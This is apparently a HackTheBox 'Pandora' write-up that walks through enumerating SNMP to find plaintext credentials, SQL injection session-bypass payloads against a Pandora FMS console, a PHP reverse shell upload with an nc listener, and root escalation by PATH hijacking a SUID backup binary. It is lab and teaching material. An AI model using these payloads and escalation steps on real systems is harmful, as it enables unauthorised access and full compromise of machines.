Pandora - [HTB]

Cover Image for Pandora - [HTB]


Pandora is an easy Linux machine from HackTheBox where you will enumerate the snmp service in order to find a command with credentials pass as parameters. These credentials can be used to gain access to the machine as daniel. Then, there is a Pandora service only available through localhost requiring port forwarding in order to exploit several vulnerabilities for the pandora's version. Finally, you will have to exploit a path hijacking weakness on a SUID to become root.


As always, let's start scanning all opened ports in the box with Nmap.

kali@kali:~/Documents/HTB/Pandora$ nmap -vv -sS -p- -n -T5 -oN AllPorts.txt
Nmap scan report for
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-01-10 11:41:31 EST for 229s
Not shown: 65533 closed ports
Reason: 65533 resets
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sU -sC -sV
Nmap scan report for
Host is up (0.17s latency).
Not shown: 916 closed ports, 83 open|filtered ports
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 4h00m19s
| snmp-interfaces:
|   lo
|     IP address:  Netmask:
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.26 Mb sent, 1.26 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address:  Netmask:
|     MAC address: 00:50:56:b9:c2:f0 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 5.74 Mb sent, 6.19 Mb received
| snmp-netstat:
|   TCP 
|   TCP
|   TCP
|   TCP
|   UDP           *:*
|   UDP          *:*
|_  UDP        *:*
| snmp-processes:
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 4h00m19.29s (1441929 timeticks)
Service Info: Host: pandora

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
Nmap scan report for
Host is up (0.045s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking for domains on the web page for being added to /etc/hosts, we obtain the following.

kali@kali:~/Documents/HTB/Pandora$ curl 2>/dev/null | grep \.htb

Accessing the web page, we can read about a monitoring solution.

Panda web page

Because the UDP port 161 is open, let's use snmpwalk to enumerate the service, finding a command with some credentials as parameters.

kali@kali:~/Documents/HTB/Pandora$ snmpwalk -v 2c panda.htb -c public | tee snmpwalk.txt
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

These credentials can be used for access as the user Daniel through SSH.

Privilege Escalation 1

We can find a virtual host only available via localhost by enumerating the machine.

daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined

To do so, we need to execute the following command.

kali@kali:~/Documents/HTB/Pandora$ ssh -L localhost:80:localhost:80 daniel@panda.htb -fN

Now we have access to pandora's console.

Pandora console

As we can see above, the pandora's version number is on the landing page. So looking for vulnerabilities, you can find the following post, which explains the SQLi login bypass. However, it doesn't show the payload in the Proof Of Concept.

There are two ways of exploiting this part:

  1. Thanks to the SQLi, we can obtain mat's PHPSESSIONID, leading us to log in as matt. Then, we will need to use another exploit to get RCE.
  2. Thanks to the SQLi and the PHP deserialisation, we can log in as admin, uploading a PHP reverse shell.

Exploitation 1

The payload to log in as matt is the following.

http://localhost/pandora_console/include/chart_generator.php?session_id=' OR `id_session`=(SELECT id_session from tsessions_php where data like '%matt%' LIMIT 1) LIMIT 1 -- -

Then, this post explains how to obtain Remote Command Execution Via the Events Feature

Exploitation 2

The payload to log in as admin is the following:

http://localhost/pandora_console/include/chart_generator.php?session_id=-1' UNION SELECT '<YOUR_PHPSESSIONID>', NULL, 'id_usuario|s:5:"admin";

Now, if we access to Admin tools/File Manager we can upload any file like /usr/share/laudanum/php/php-reverse-shell.php that will be stored under the /images/ directory.

kali@kali:~/Documents/HTB/Pandora$ curl -s & http://localhost/pandora_console/images/shell.php
kali@kali:~/Documents/HTB/Pandora$ nc -nlvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 34170
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 21:23:15 up  7:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0     17:29   35.00s  0.72s  0.72s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)

Privilege Escalation

Thanks to linpeas, we can see a SUID binary that can only be executed as the user matt.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
-rwsr-x--- 1 root   matt        17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

With ltrace, we can see that it doesn't use an absolute path for executing the tar command. Hence, we can do path hijacking to become root.

matt@pandora:/$ ltrace /usr/bin/pandora_backup
getuid()= 1000
geteuid()= 1000
setreuid(1000, 1000)= 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility)= 26
puts("Now attempting to backup Pandora"...Notow attempting to backup PandoraFMS client)= 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)                                                     = 39
+++ exited (status 1) +++

However, we need to access the machine as matt through SSH in order to make it work.

matt@pandora:/home/matt$ mkdir /home/matt/.ssh/
matt@pandora:/home/matt$ chmod 0700 .ssh
matt@pandora:/home/matt$ echo "<>" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$ chmod 0600 /home/matt/.ssh/authorized_keys
kali@kali:~/Documents/HTB/Pandora$ ssh matt@panda.htb

Finally, once logged in, we can become root executing the following commands.

matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash -p" > tar
matt@pandora:/tmp$ chmod +x tar
matt@pandora:/tmp$ export $PATH=$(pwd):$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp# cat /root/root.txt